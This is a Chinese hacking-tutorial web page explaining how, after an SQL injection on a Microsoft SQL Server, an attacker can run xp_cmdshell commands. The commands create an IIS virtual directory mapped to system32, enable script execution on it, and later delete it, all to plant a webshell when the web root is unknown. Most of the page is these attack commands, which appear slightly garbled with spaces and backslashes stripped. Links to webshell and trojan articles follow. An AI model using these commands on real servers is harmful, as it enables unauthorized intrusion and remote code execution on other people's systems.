手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >SQL注入建立虚拟目录,找Web绝对路径!
SQL注入建立虚拟目录,找Web绝对路径!
摘要:我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:exec...

我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:

execmaster.dbo.xp_cmdshell'cscriptC:InterpubAdminScriptsmkwebdir.vbs-clocalhost-w"l"-v"win","c:winntsystem32"'

建立虚拟目录win,指向c:winntsystem32

execmaster.dbo.xp_cmdshell'cscriptC:InterpubAdminScriptsadsutil.vbsw3svc/1/root/win/AccessexecuteTure'

让win句有解析asp脚本权限

execmaster.dbo.xp_cmdshell"cscriptC:InterpubAdminScriptsadsutil.vbsdeletew3svc/1/root/h4x0r/"

删除虚拟目录。

找不到web绝对路径的一种解决办法,

http://21o.net/h4x0r

403错误,表示虚拟目录建好了。。。

【SQL注入建立虚拟目录,找Web绝对路径!】相关文章:

AngelShell:让所有正向程序实现反向连接(应用篇)

利用Session欺骗构造最隐蔽的WebShell

UPDATE注射(mysql+php)的两个模式

网友举报:屁屁宽频软件自带木马病毒(图)

BBSXP漏洞再探究

ADSL密码大集合

技巧和诀窍防范SQL注入攻击

一种可以穿透还原卡和还原软件的代码

PHP博客程序C-blog2.0漏洞测试大揭密(图)

破解别人的asp木马密码的方法

精品推荐
分类导航